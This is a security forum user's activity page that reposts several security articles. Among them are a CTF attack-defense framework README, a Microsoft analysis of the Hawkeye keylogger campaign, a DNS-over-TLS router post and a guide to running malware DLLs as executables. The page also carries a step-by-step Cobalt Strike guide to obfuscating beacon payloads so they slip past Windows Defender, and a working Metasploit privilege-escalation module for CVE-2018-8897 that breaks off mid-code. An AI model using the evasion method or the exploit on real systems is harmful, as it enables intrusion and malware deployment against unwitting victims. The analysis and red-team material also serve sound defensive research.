Jump to content


  • Content count

  • Joined

  • Last visited

  • Days Won


Nytro last won the day on July 20

Nytro had the most liked content!

Community Reputation

3208 Excellent

About Nytro

  • Rank
  • Birthday 03/11/1991

Recent Profile Visitors

18177 profile views
  1. Nytro


  2. Nytro


    Nu se reproduce la ei, am incercat si eu. Nu e de la IPBoard, e de la singurul plugin amarat pe care il aveam si noi: https://invisioncommunity.com/files/file/8395-ne-hide-post-content/ L-am dezactivat si e ok acum.
  3. Nytro


    L-am raportat, am acordat credite (evident). Revin cand am un raspuns de la ei. Multumim frumos!
  4. Nytro


  5. Nytro

    Ajutor program java

    Vezi asta: https://stackoverflow.com/questions/13102045/scanner-is-skipping-nextline-after-using-next-or-nextfoo
  6. Nytro


    CTFPWNng Next-gen automation framework for attack-defense CTFs. Dependencies Redis (redis-server and redis-cli) Nmap GNU parallel Usage ./ctfpwn.sh Target Identification The targets directory includes a wrapper script (run-targets.sh) that runs Nmap scans on the target range in order to identify alive hosts. This script should run regularly as a cronjob (TBD). Before ctfpwn.sh can be started, the script should run at least once to create a initial output file: cd targets ./run-targets.sh Add Exploits Adding a new exploit is as easy as copying the exploits/_template directory. The following example creates an exploit for a service called wood cd ctfpwnng cp -r exploits/_template exploits/wood An exploit directory requires at least two files (already included in the exploits/_template directory): service: A service definition file. This file must contain the _SERVICE_NAME and _SERVICE_PORT variables. run.sh: The exploit wrapper script that either includes or starts the actual exploit code. It is also responsible for calling the log_flags() function that will add flags to the Redis database. Disable Exploits Exploits can be disabled by either creating a .disabled file: touch exploits/wood/.disabled Or by preceeding the exploit directory name with an underscore: mv exploits/wood exploits/_wood Sursa: https://github.com/takeshixx/ctfpwnng
  7. Cobalt Strike – Bypassing Windows Defender with Obfuscation Guest post by team member @taso_x For all red teamers delivering payloads while not kicking off all the bells and whistles of the organization is always a challenge. Just like all other security solutions Windows Defender has become better at detecting generic payloads generated with tools such as Cobalt Strike. In this example we will go through the generation of a PowerShell payload with Cobalt Strike and see how we can manipulate it in a way that it will execute bypassing Windows Defender on a Windows 10 PC. This is not the most elegant or easier solution to hide your payloads from Windows Defender but it is one of the methods we use and it works. The process for creating the payload is as follows: This will result to payload.txt being created which includes a PowerShell command. If we try to run the command on the victim PC we are greeted by Windows Defender which picks it up as a threat. In order to bypass Windows Defender we need to first understand how Cobalt Strike creates its payloads and then change some of its signatures hoping that Windows Defender will consider it safe. First of all it is obvious that the payload command it base64 encoded by either looking at the format or by the -encodedcommand PowerShell flag. To decode the command we need to cut out the powershell.exe -nop -w hidden -encodedcommand part and keep the rest. Then decode the rest of the string with the following command. echo 'base64 payload' | base64 -d The resultant decoded string includes a base64 encoded string again but trying to decode that will not work and spit out gibberish because the string is also Gzip compressed apparent from the IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s[IO.Compression.CompressionMode]::Decompress))).ReadToEnd() part of the PowerShell command. Now we need to understand what is inside this command as this is the part which is actually triggering Windows Defender i.e the payload. Through some Google searching I found this PowerShell script that does exactly that http://chernodv.blogspot.com.cy/2014/12/powershell-compression-decompression.html $data = [System.Convert]::FromBase64String('gzip base64') $ms = New-Object System.IO.MemoryStream $ms.Write($data, 0, $data.Length) $ms.Seek(0,0) | Out-Null $sr = New-Object System.IO.StreamReader(New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Decompress)) $sr.ReadToEnd() | set-clipboard The script will first base64 decode the string and the decompress it providing us with the entire code. It will also copy the contents of the output to the clipboard to paste it in a text file which is going to be used later on. The $var_code variable holds the payload which is being detected by Windows Defender and we will need to swap out to bypass the defender. Decoding $var_code further it is a series of ASCII characters but decoding it fully is not required at this point. $enc=[System.Convert]::FromBase64String('encoded string') We can read part of the contents with: $readString=[System.Text.Encoding]::ASCII.GetString($enc) The above now shows some information about the user agent and our attackers IP. The target now is to take the current payload and obfuscate it in a way that it will trick Windows Defender. The best tool and the tool of choice for this type of job is Invoke-Obfuscation by Daniel Bohannon. The Github page for the project can be found here. The commands for starting with Invoke-Obfuscation are: Import-Module .\Invoke-Obfuscation.psd1 Invoke-Obfuscation Now we need to define the payload part that we need to obfuscate. This can be done with the following command Set scriptblock 'final_base64payload' The tool will take our script block and then ask us for the way that we want to proceed. In this case i chose COMPRESS and then 1. This doesn’t mean that the other options will not work but i found this one to be working at the time of writing. Invoke-Obfuscation will do it’s magic and print out a PowerShell command which is mangled enough that it could potentially bypass Windows Defender. Then just type Out and the path that you want to save this as a PowerShell script. Out c:\payload.ps1 The current decompressed payload from previous steps looks like this. So it all boils down to the fact that we need to replace the [Byte[]]$var_code = [System.Convert]::FromBase64String contents with our newly created payload from Invoke-Obfuscation. To do that i define a new variable which i call $evil and just put the contents of the output from Invoke-Obfuscation. Important – You need to strip out the part after the last | from the output of Invoke-Obfuscation because that it’s the command that executes the command. We will not need that because the Cobalt Strike template will do that for us. Save the edited script into a PowerShell file and execute it. The result should be a beacon in Cobalt Strike and a Slack notification if your are using @sec_groundzero Aggressor Script If we examine both the vanilla CS payload and the modified CS payload with Process Hacker we see that we don’t change the underlying behaviour of the beacon. Sursa: http://www.offensiveops.io/tools/cobalt-strike-bypassing-windows-defender-with-obfuscation/
  8. How to turn a DLL into a standalone EXE Posted on July 21, 2016 by hasherezade During malware analysis we can often encounter payloads in form of DLLs. Analyzing them dynamically may not be very handy, because they need some external loaders to run. Different researchers have different tricks to deal with them. In this post I will describe some of my tricks for patching DLLs, so that they can run as independent executables. Usually we can encounter 2 cases: meaningful code starts in one of the exported functions meaningful code starts in DllMain To illustrate those cases with real-life examples I will use 2 malware samples. First case – represented by Bunitu Trojan (b0a91e1f91078bad48252edc989e868e) and second case: represented by Petya/Mischa dropper (c8e4829dcba8b288bd0ed75717214db6). Those DLLs have been unpacked from their loaders/crypters – but in order to keep things simple I am not gonna describe here the full process of unpacking. In both cases we will start from editing the field Characteristics in the File Header and removing the flag indicating that the file is a DLL. I will do it using PE-bear: I changed the value: Case #1: When the meaningful code starts in the exported function In this case, one more modification is required before we save the file. We have to change the entry point in order to point the appropriate function from export table – the one where the execution of the meaningful code starts. We need to find the Function RVA: Then, follow it: On the Disasm tab we can see the code of this function. Now, we should redirect Entry Point to it’s beginning: And save the file as EXE: In case of Bunitu Trojan, this function does not take any parameters, so we not need to fill anything more. Now, we can run the saved file like a normal executable (see the patched version at malwr). Case #2 – meaningful code starts in DllMain This time we not need to change the Entry Point – just after changing Characteristics in File Header save the file and load it under a debugger (I will use OllyDbg). Similarly to the main function in typical executables, DLLs have their DllMain function that is executed automatically when they are loaded to the memory (the same function is also executed on few more events – i.e. on DLL unloading). Let’s recall it’s header: BOOL WINAPI DllMain( _In_ HINSTANCE hinstDLL, _In_ DWORD fdwReason, _In_ LPVOID lpvReserved ); As we can see, the function takes 3 arguments. The first one (hinstDLL) is the handle to the memory area where the DLL has been loaded. Second stores a value that indicates the reason why the DllMain has been triggered. Read more here. To make our patched DLL run properly, we must take care that it’s arguments will be filled with proper values – especially important are the first two that I mentioned. The first argument: hinstDLL – must contain the module handle (ImageBase). Second usually should be filled with 1 – to emulate DLL_PROCESS_ATTACH. That’s how the Entry Point of the dumped executable looks: Let’s add a code that will overwrite the arguments with valid values. I will utilize some free cave for this purpose. Fortunately, there is enough space at the end of the code section: I am gonna do some patching in order to redirect execution to this place. We need 5 bytes for the jump – so, let’s remove/rearrange some code in order to gain the space (if we are lacking in space, some instructions can be also moved to the cave, along with the added code): Patched – step 1: Patched – step 2: I redirected execution to the mentioned cave. We will copy aside the address that is just after the added jump, to go back to this place later. Now let’s fill the cave with needed code. To fill the first argument with the valid ImageBase I will copy the value from Process Environment Block (pointed by FS:[30]) . This is example of the code that do this job: MOV EAX, [FS:0X30] ; copy to EAX handle to PEB MOV EAX, [EAX+0X8] ; copy to EAX the field with ImageBase MOV [EBP+0X8], EAX ; copy the content of EAX into the first argument Now, let’s fill the second argument with a vale 1, emulating that the DLL is loaded: MOV DWORD [EBP+0XC], 0X1 The third argument can be filled with NULL: MOV DWORD [EBP+0X10], 0 Added code: Now only returning jump is remaining: And we can save the modified executable: Now we can run/debug the saved file as a standalone executable. Ending note Of course the described techniques are not a silver bullet and they may not cover all the cases you encounter. My goal was just to provide some examples and inspiration for experiments. However, those simple tricks worked for me in many cases making the work much easier. Appendix https://en.wikipedia.org/wiki/Win32_Thread_Information_Block https://en.wikipedia.org/wiki/Process_Environment_Block Sursa: https://hshrzd.wordpress.com/2016/07/21/how-to-turn-a-dll-into-a-standalone-exe/
  9. DNS-Over-TLS Built-In & Enforced - and the GL.iNet GL-AR750S 14 Jul 2018 by Junade Ali. inShare GL.iNet GL-AR750S in black, same form-factor as the prior white GL.iNet GL-AR750. Credit card for comparison. Back in April, I wrote about how it was possible to modify a router to encrypt DNS queries over TLS using Cloudflare's DNS Resolver. For this, I used the GL.iNet GL-AR750 because it was pre-installed with OpenWRT (LEDE). The folks at GL.iNet read that blog post and decided to bake DNS-Over-TLS support into their new router using the resolver, they sent me one to take a look at before it's available for pre-release. Their new router can also be configured to force DNS traffic to be encrypted before leaving your local network, which is particularly useful for any IoT or mobile device with hard-coded DNS settings that would ordinarily ignore your routers DNS settings and send DNS queries in plain-text. In my previous blog post I discussed how DNS was often the weakest link in the chain when it came to browsing privacy; whilst HTTP traffic is increasingly encrypted, this is seldom the case for DNS traffic. This makes it relatively trivial for an intermediary to work out what site you're sending traffic to. In that post, I went through the technical steps required to modify a router using OpenWRT to support DNS Privacy using the DNS-Over-TLS protocol. GL.iNet were in contact since I wrote the original blog post and very supportive of encrypting DNS queries at the router level. Last week whilst working in Cloudflare's San Francisco office, they reached out to me over Twitter to let me know they were soon to launch a new product with a new web UI containing a "DNS over TLS from Cloudflare" feature and offered to send me the new router before it was even available for pre-order. On arrival back to our London office, I found a package from Hong Kong waiting for me. Aside from the difference in colour, the AR750S itself is identical in form-factor to the AR750 and was packaged up very similarly. They both have capacity for external storage, an OpenVPN client and can be powered over USB; amongst many other useful functionalities. Alongside the S suffixing the model number, I did notice the new model had some upgraded specs, but I won't dwell on that here. Below you can see the white AR750 and the new black AR750S router together for comparison. Both have a WAN ethernet port, 2 LAN ethernet ports, a USB port for external storage (plus a micro SD port) and a micro USB power port. The UI is where the real changes come. In the More Settings tab, there's an option to configure DNS with some nice options. One notable option is the DNS over TLS from Cloudflare toggle. This option uses the TLS security protocol for encrypting DNS queries, helping increase privacy and prevent eavesdropping. Another option, Override DNS Settings for All Clients, forcibly overrides the DNS configuration on all clients so that queries are encrypted to the WAN. Unencrypted DNS traffic is intercepted by the router, and by forcing traffic to use it's own local resolver, it is able to transparently rewrite traffic to be encrypted before leaving the router and heading out into the public internet to the upstream resolver - This option is particularly useful when dealing with embedded systems or IoT devices which don't have configurable DNS options; Smart TVs, TV boxes, your toaster, etc. As this router can proxy traffic over to other Wi-Fi networks (and is portable), this is particularly useful when connecting out to an ordinarily insecure Wi-Fi network; the router can sit in the middle and transparently upgrade unencrypted DNS queries. This is even useful when dealing with phones and tablets where you can't install a DNS-Over-TLS client. These options both come disabled by default, but can easily be toggled in the UI. As before, you can configure other DNS resolvers by toggling "Manual DNS Server Settings" and entering in any other DNS servers. There are a number of other cool features I've noticed in this router; for example, the More Settings > Advanced option takes you into a standard LuCi UI that ordinarily comes bundled with LEDE routers. Like previous routers, you can easily SSH into the device and install various program and perform customisations. For example; after installing TCPDump on the router, I am able to run tcpdump -n -i wlan-sta 'port 853' to see encrypted DNS traffic leaving the router. When I run a DNS query over an unencrypted resolver (using dig A junade.com on my local computer), I can see the outgoing DNS traffic upgraded to encrypted queries on and If you're interested in learning how to configure on other routers, your computer or your phone - check out the project landing page at If you're a developer and want to learn about how you can integrate into your project with either DNS-Over-TLS or DNS-Over-HTTPS, checkout the Developer Documentation. Tagged with, DNS, Security, TLS, Privacy, Resolver, IoT Sursa: https://blog.cloudflare.com/dns-over-tls-built-in/
  10. Hawkeye Keylogger – Reborn v8: An in-depth campaign analysis July 11, 2018 Office 365 Threat Research in Microsoft 365, Office 365 Advanced Threat Protection, Windows Defender Advanced Threat Protection, Endpoint Security, Threat Protection, Research Much of cybercrime today is fueled by underground markets where malware and cybercriminal services are available for purchase. These markets in the deep web commoditize malware operations. Even novice cybercriminals can buy malware toolkits and other services they might need for malware campaigns: encryption, hosting, antimalware evasion, spamming, and many others. Hawkeye Keylogger is an info-stealing malware that’s being sold as malware-as-a-service. Over the years, the malware authors behind Hawkeye have improved the malware service, adding new capabilities and techniques. It was last used in a high-volume campaign in 2016. This year marked the resurgence of Hawkeye. In April, malware authors started peddling a new version of the malware that they called Hawkeye Keylogger – Reborn v8. Not long after, on April 30, Office 365 Advanced Threat Protection (Office 365 ATP) detected a high-volume campaign that distributed the latest variants of this keylogger. At the onset, Office 365 ATP blocked the email campaign and protected customers, 52% of whom are in the software and tech sector. Companies in the banking (11%), energy (8%), chemical (5%), and automotive (5%) industries are also among the top targets Figure 1. Top industries targeted by the April 2018 Hawkeye campaign Office 365 ATP uses intelligent systems that inspect attachments and links for malicious content to protect customers against threats like Hawkeye in real time. These automated systems include a robust detonation platform, heuristics, and machine learning models. Office 365 ATP uses intelligence from various sensors, including multiple capabilities in Windows Defender Advanced Threat Protection (Windows Defender ATP). Windows Defender AV (a component of Windows Defender ATP) detected and blocked the malicious attachments used in the campaign in at least 40 countries. United Arab Emirates accounted for 19% of these file encounters, while the Netherlands (15%), the US (11%), South Africa (6%) and the UK (5%) make the rest of the top 5 countries that saw the lure documents used in the campaign. A combination of generic and heuristic protections in Windows Defender AV (TrojanDownloader:O97M/Donoff, Trojan:Win32/Tiggre!rfn, Trojan:Win32/Bluteal!rfn, VirTool:MSIL/NetInject.A) ensured these threats are blocked in customer environments. Figure 2. Top countries that encountered malicious documents used in the Hawkeye campaign As part of our job to protect customers from malware attacks, Office 365 ATP researchers monitor malware campaigns like Hawkeye and other developments in the cybercriminal landscape. Our in-depth investigation into malware campaigns like Hawkeye and many others adds to the vast threat intelligence we get from the Microsoft Intelligent Security Graph, which enables us to continuously raise the bar in security. Through the Intelligent Security Graph, security technologies in Microsoft 365 share signals and detections, allowing these technologies to automatically update protection and detection mechanisms, as well as orchestrate remediation across Microsoft 365. Figure 3. Microsoft 365 threat protection against Hawkeye Campaign overview Despite its name, Hawkeye Keylogger – Reborn v8 is more than a common keylogger. Over time, its authors have integrated various modules that provide advanced functionalities like stealth and detection evasion, as well as credential theft and more. Malware services like Hawkeye are advertised and sold in the deep web, which requires anonymity networks like Tor to access, etc. Interestingly, the Hawkeye authors advertised their malware and even published tutorial videos on a website on the surface web (that has since been taken down). Even more interesting, based on underground forums, it appears the malware authors have employed intermediary resellers, an example of how cybercriminal underground business models expand and evolve. Our investigation into the April 2018 Hawkeye campaign shows that the cybercriminals have been preparing for the operation since February, when they registered the domains they later used in the campaign. Typical of malware campaigns, the cybercriminals undertook the following steps: Built malware samples and malware configuration files using a malware builder they acquired from the underground Built weaponized documents to be used a social engineering lure (possibly by using another tool bought in the underground) Packed or obfuscated the samples (using a customized open-source packer) Registered domains for delivery of malware Launched a spam campaign (possibly using a paid spam service) to distribute the malware Like other malware toolkits, Hawkeye comes with an admin panel that cybercriminals use to monitor and control the attack. Figure 4: Hawkeye’s admin panel Interestingly, some of the methods used in this Hawkeye campaign are consistent with previous attacks. This suggests that the cybercriminals behind this campaign may be the same group responsible for malware operations that delivered the remote access tool (RAT) Remcos and the info-stealing bot malware Loki. The following methods were used in these campaigns: Multiple documents that create a complicated, multi-stage delivery chain Redirections using shortened bit.ly links Use of malicious macro, VBScript, and PowerShell scripts to run the malware; the Remcos campaign employed an exploit for CVE-2017-0199 but used the same domains Consistent obfuscation technique across multiple samples Point of entry In late April, Office 365 ATP analysts spotted a new spam campaign with the subject line RFQ-GHFD456 ADCO 5647 deadline 7th May carrying a Word document attachment named Scan Copy 001.doc. While the attachment’s file name extension was .doc, it was in fact a malicious Office Open XML format document, which usually uses a .docx file name extension. In total, the campaign used four different subject lines and five attachments. Figure 5: Sample emails used in the Hawkeye campaign Because the attachment contains malicious code, Microsoft Word opens with a security warning. The document uses a common social engineering lure: it displays a fake message and an instruction to “Enable editing” and “Enable content”. Figure 6: The malicious document with social engineering lure The document contains an embedded frame that connects to a remote location using a shortened URL. Figure 7: frame in settings.rels.xml on the document The frame loads an .rtf file from hxxp://bit[.]ly/Loadingwaitplez, which redirects to hxxp://stevemike-fireforce[.]info/work/doc/10.doc. Figure 8: RTF loaded as a frame inside malicious document The RTF has an embedded malicious .xlsx file with macro as an OLE object, which in turn contains a stream named PACKAGE that contains the .xlsx contents. The macro script is mostly obfuscated, but the URL to the malware payload is notably in plaintext. Figure 9: Obfuscated macro entry point De-obfuscating the entire script makes its intention clear. The first section uses PowerShell and the System.Net.WebClient object to download the malware to the path C:\Users\Public\svchost32.exe and execute it. The macro script then terminates both winword.exe and excel.exe. In specific scenarios where Microsoft Word overrides default settings and is running with administrator privileges, the macro can delete Windows Defender AV’s malware definitions. It then changes the registry to disable Microsoft Office’s security warnings and safety features. In summary, the campaign’s delivery comprises of multiple layers of components that aim to evade detection and possibly complicate analysis by researchers. Figure 10: The campaign’s delivery stages The downloaded payload, svchost32.exe, is a .NET assembly named Millionare that is obfuscated using a custom version of ConfuserEx, a well-known open-source .NET obfuscator. Figure 11: Obfuscated .NET assembly Millionare showing some of the scrambled names The obfuscation modifies the .NET assembly’s metadata such that all the class and variable names are non-meaningful and scrambled names in Unicode. This obfuscation causes some analysis tools like .NET Reflector to show some namespaces or classes names as blank, or in some cases, display parts of the code backwards. Figure 12: .NET Reflector presenting the code backwards due to obfuscation Finally, the .NET binary loads an unpacked .NET assembly, which includes DLL files embedded as resources in the portable executable (PE). Figure 13: Loading the unpacked .NET assembly during run-time Malware loader The DLL that initiates the malicious behavior is embedded as a resource in the unpacked .NET assembly. It is loaded in memory using process hollowing, a code injection technique that involves spawning a new instance of a legitimate process and then “hollowing it out”, i.e., replacing the legitimate code with malware. Figure 14: In-memory unpacking of the malware using process hollowing. Unlike previous Hawkeye variants (v7), which loaded the main payload into its own process, the new Hawkeye malware injects its code into MSBuild.exe, RegAsm.exe, and VBC.exe, which are signed executables that ship with .NET framework. This is an attempt to masquerade as a legitimate process. Figure 15: Obfuscated calls using .NET reflection to perform process hollowing injection routine that injects the malware’s main payload into RegAsm.exe Additionally, in the previous version, the process hollowing routine was written in C. In the new version, this routine is completely rewritten as a managed .NET that calls the native Windows API. Figure 16: Process hollowing routine implemented in .NET using native API function calls Malware functionalities The new Hawkeye variants created by the latest version of the malware toolkit have multiple sophisticated functions for information theft and evading detection and analysis. Information theft The main keylogger functionality is implemented using hooks that monitor key presses, as well as mouse clicks and window context, along with clipboard hooks and screenshot capability. It has specific modules for extracting and stealing credentials from the following applications: Beyluxe Messenger Core FTP FileZilla Minecraft (replaced the RuneScape module in previous version) Like many other malware campaigns, it uses the legitimate BrowserPassView and MailPassView tools to dump credentials from the browser and email client. It also has modules for taking screenshots of the desktop, as well as the webcam, if it exists. Notably, the malware has a mechanism to visit certain URLs for click-based monetization. Stealth and anti-analysis On top of the processes hollowing technique, this malware uses other methods for stealth, including alternate data streams that remove mark of the web (MOTW) from the malware’s downloaded files. This malware can be configured to delay execution by any number of seconds, a technique used mainly to avoid detection by various sandboxes. It prevents antivirus software from running using an interesting technique. It adds keys to the registry location HKLM\Software\Windows NT\Current Version\Image File Execution Options and sets the Debugger value for certain processes to rundll32.exe, which prevents execution. It targets the following processes related to antivirus and other security software: AvastSvc.exe AvastUI.exe avcenter.exe avconfig.exe avgcsrvx.exe avgidsagent.exe avgnt.exe avgrsx.exe avguard.exe avgui.exe avgwdsvc.exe avp.exe avscan.exe bdagent.exe ccuac.exe ComboFix.exe egui.exe hijackthis.exe instup.exe keyscrambler.exe mbam.exe mbamgui.exe mbampt.exe mbamscheduler.exe mbamservice.exe MpCmdRun.exe MSASCui.exe MsMpEng.exe msseces.exe rstrui.exe spybotsd.exe wireshark.exe zlclient.exe Further, it blocks access to certain domains that are usually associated with antivirus or security updates. It does this by modifying the HOSTS file. The list of domains to be blocked is determined by the attacker using a config file. This malware protects its own processes. It blocks the command prompt, registry editor, and task manager. It does this by modifying registry keys for local group policy administrative templates. It also constantly checks active windows and renders action buttons unusable if the window title matches “ProcessHacker”, “Process Explorer”, or “Taskmgr”. Meanwhile, it prevents other malware from infecting the machine. It repeatedly scans and removes any new values to certain registry keys, stops associated processes, and deletes related files. Hawkeye attempts to avoid automated analysis. The delay in execution is designed to defeat automated sandbox analysis that allots only a certain time for malware execution and analysis. It likewise attempts to evade manual analysis by monitoring windows and exiting when it finds the following analysis tools: Sandboxie Winsock Packet Editor Pro Wireshark Defending mailboxes, endpoints, and networks against persistent malware campaigns Hawkeye illustrates the continuous evolution of malware in a threat landscape fueled by the cybercriminal underground. Malware services make malware accessible to even unsophisticated operators, while simultaneously making malware more durable with advanced techniques like in-memory unpacking and abuse of .NET’s CLR engine for stealth. In this blog we covered the capabilities of its latest version, Hawkeye Keylogger – Reborn v8, highlighting some of the enhancements from the previous version. Given its history, Hawkeye is likely to release a new version in the future. Organizations should continue educating their employees about spotting and preventing social engineering attacks. After all, Hawkeye’s complicated infection chain begins with a social engineering email and lure document. A security-aware workforce will go a long way in securing networks against attacks. More importantly, securing mailboxes, endpoints, and networks using advanced threat protection technologies can prevent attacks like Hawkeye, other malware operations, and sophisticated cyberattacks. Our in-depth analysis of the latest version and our insight into the cybercriminal operation that drives this development allow us to proactively build robust protections against both known and unknown threats. Office 365 Advanced Threat Protection (Office 365 ATP) protects mailboxes as well as files, online storage, and applications from malware campaigns like Hawkeye. It uses a robust detonation platform, heuristics, and machine learning to inspect attachments and links for malicious content in real-time, ensuring that emails that carry Hawkeye and other threats don’t reach mailboxes and devices. Learn how to add Office 365 ATP to existing Exchange or Office 365 plans. Windows Defender Antivirus (Windows Defender AV) provides an additional layer of protection by detecting malware delivered through email, as well as other infection vectors. Using local and cloud-based machine learning, Windows Defender AV’s next-gen protection can block even new and unknown threats on Windows 10 and Windows 10 in S mode. Additionally, endpoint detection and response (EDR) capabilities in Windows Defender Advanced Threat Protection (Windows Defender ATP) expose sophisticated and evasive malicious behavior, such as those used by Hawkeye. Sign up for free Windows Defender ATP trial. Windows Defender ATP’s rich detection libraries are powered by machine learning and allows security operations teams to detect and respond to anomalous attacks in the network. For example, machine learning detection algorithms surface the following alert when Hawkeye uses a malicious PowerShell to download the payload: Figure 16: Windows Defender ATP alert for Hawkeye’s malicious PowerShell component Windows Defender ATP also has behavior-based machine learning algorithms that detect the payload itself: Figure 17: Windows Defender ATP alert for Hawkeye’s payload These security technologies are part of the advanced threat protection solutions in Microsoft 365. Enhanced signal sharing across services in Windows, Office 365, and Enterprise Mobility + Security through the Microsoft Intelligent Security Graph enables the automatic update of protections and orchestration of remediation across Microsoft 365. Office 365 ATP Research Indicators of Compromise (Ioc) Email subject lines {EXT} NEW ORDER ENQUIRY #65563879884210# B/L COPY FOR SHIPMENT Betreff: URGENT ENQ FOR Equipment RFQ-GHFD456 ADCO 5647 deadline 7th May Attachment file names Betreff URGENT ENQ FOR Equipment.doc BILL OF LADING.doc NEW ORDER ENQUIRY #65563879884210#.doc Scan Copy 001.doc Swift Copy.doc Domains lokipanelhostingpanel[.]gq stellarball[.]com stemtopx[.]com stevemike-fireforce[.]info Shortened redirector links hxxp://bit[.]ly/ASD8239ASdmkWi38AS (was also used in a Remcos campaign) hxxp://bit[.l]y/loadingpleaswaitrr hxxp://bit[.l]y/Loadingwaitplez Files (SHA-256) d97f1248061353b15d460eb1a4740d0d61d3f2fcb41aa86ca6b1d0ff6990210a – .eml 23475b23275e1722f545c4403e4aeddf528426fd242e1e5e17726adb67a494e6 – .eml 02070ca81e0415a8df4b468a6f96298460e8b1ab157a8560dcc120b984ba723b – .eml 79712cc97a19ae7e7e2a4b259e1a098a8dd4bb066d409631fb453b5203c1e9fe – .eml 452cc04c8fc7197d50b2333ecc6111b07827051be75eb4380d9f1811fa94cbc2 – .eml 95511672dce0bd95e882d7c851447f16a3488fd19c380c82a30927bac875672a – .eml 1b778e81ee303688c32117c6663494616cec4db13d0dee7694031d77f0487f39 – .eml 12e9b955d76fd0e769335da2487db2e273e9af55203af5421fc6220f3b1f695e – .eml 12f138e5e511f9c75e14b76e0ee1f3c748e842dfb200ac1bfa43d81058a25a28 – .eml 9dfbd57361c36d5e4bda9d442371fbaa6c32ae0e746ebaf59d4ec34d0c429221 – .docx (stage 1) f1b58fd2bc8695effcabe8df9389eaa8c1f51cf4ec38737e4fbc777874b6e752 – .rtf (stage 2) 5ad6cf87dd42622115f33b53523d0a659308abbbe3b48c7400cc51fd081bf4dd – .doc 7db8d0ff64709d864102c7d29a3803a1099851642374a473e492a3bc2f2a7bae – .rtf 01538c304e4ed77239fc4e31fb14c47604a768a7f9a2a0e7368693255b408420 – .rtf d7ea3b7497f00eec39f8950a7f7cf7c340cf9bf0f8c404e9e677e7bf31ffe7be – .vbs ccce59e6335c8cc6adf973406af1edb7dea5d8ded4a956984dff4ae587bcf0a8 – .exe (packed) c73c58933a027725d42a38e92ad9fd3c9bbb1f8a23b3f97a0dd91e49c38a2a43 – .exe (unpacked) *Updated 07/12/18 (Removed statement that Hawkeye Keylogger is also known as iSpy Keylogger Sursa: https://cloudblogs.microsoft.com/microsoftsecure/2018/07/11/hawkeye-keylogger-reborn-v8-an-in-depth-campaign-analysis/
  11. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core/post/common' require 'msf/core/post/file' require 'msf/core/post/windows/priv' require 'msf/core/post/windows/registry' require 'msf/core/exploit/exe' class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::Common include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability', 'Description' => %q{ This module exploits a vulnerability in a statement in the system programming guide of the Intel 64 and IA-32 architectures software developer's manual being mishandled in various operating system kerneles, resulting in unexpected behavior for #DB excpetions that are deferred by MOV SS or POP SS. This module will upload the pre-compiled exploit and use it to execute the final payload in order to gain remote code execution. }, 'License' => MSF_LICENSE, 'Author' => [ 'Nick Peterson', # Original discovery (@nickeverdox) 'Nemanja Mulasmajic', # Original discovery (@0xNemi) 'Can Bölük <can1357>', # PoC 'bwatters-r7' # msf module ], 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ], 'Targets' => [ [ 'Windows x64', { 'Arch' => ARCH_X64 } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'May 08 2018', 'References' => [ ['CVE', '2018-8897'], ['EDB', '44697'], ['BID', '104071'], ['URL', 'https://github.com/can1357/CVE-2018-8897/'], ['URL', 'https://blog.can.ac/2018/05/11/arbitrary-code-execution-at-ring-0-using-cve-2018-8897/'] ], 'DefaultOptions' => { 'DisablePayloadHandler' => 'False' } )) register_options([ OptString.new('EXPLOIT_NAME', [false, 'The filename to use for the exploit binary (%RAND% by default).', nil]), OptString.new('PAYLOAD_NAME', [false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]), OptString.new('PATH', [false, 'Path to write binaries (%TEMP% by default).', nil]), OptInt.new('EXECUTE_DELAY', [false, 'The number of seconds to delay before executing the exploit', 3]) ]) end def setup super @exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6)) @payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6)) @exploit_name = "#{exploit_name}.exe" unless exploit_name.match(/\.exe$/i) @payload_name = "#{payload_name}.exe" unless payload_name.match(/\.exe$/i) @temp_path = datastore['PATH'] || session.sys.config.getenv('TEMP') @payload_path = "#{temp_path}\\#{payload_name}" @exploit_path = "#{temp_path}\\#{exploit_name}" @payload_exe = generate_payload_exe end def validate_active_host begin host = session.session_host print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}") rescue Rex::Post::Meterpreter::RequestError => e elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") raise Msf::Exploit::Failed, 'Could not connect to session' end end def validate_remote_path(path) unless directory?(path) fail_with(Failure::Unreachable, "#{path} does not exist on the target") end end def validate_target if sysinfo['Architecture'] == ARCH_X86 fail_with(Failure::NoTarget, 'Exploit code is 64-bit only') end if sysinfo['OS'] =~ /XP/ fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP') end end def ensure_clean_destination(path) if file?(path) print_status("#{path} already exists on the target. Deleting...") begin file_rm(path) print_status("Deleted #{path}") rescue Rex::Post::Meterpreter::RequestError => e elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") print_error("Unable to delete #{path}") end end end def ensure_clean_exploit_destination ensure_clean_destination(exploit_path) end def ensure_clean_payload_destination ensure_clean_destination(payload_path) end def upload_exploit local_exploit_path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2018-8897-exe', 'cve-2018-8897-exe.exe') upload_file(exploit_path, local_exploit_path) print_status("Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}") end def upload_payload write_file(payload_path, payload_exe) print_status("Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_path}") end def execute_exploit sleep(datastore['EXECUTE_DELAY']) print_status("Running exploit #{exploit_path} with payload #{payload_path}") output = cmd_exec('cmd.exe', "/c #{exploit_path} #{payload_path}") vprint_status(output) end def exploit begin validate_active_host validate_target validate_remote_path(temp_path) ensure_clean_exploit_destination ensure_clean_payload_destination upload_exploit upload_payload execute_exploit rescue Rex::Post::Meterpreter::RequestError => e elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") print_error(e.message) 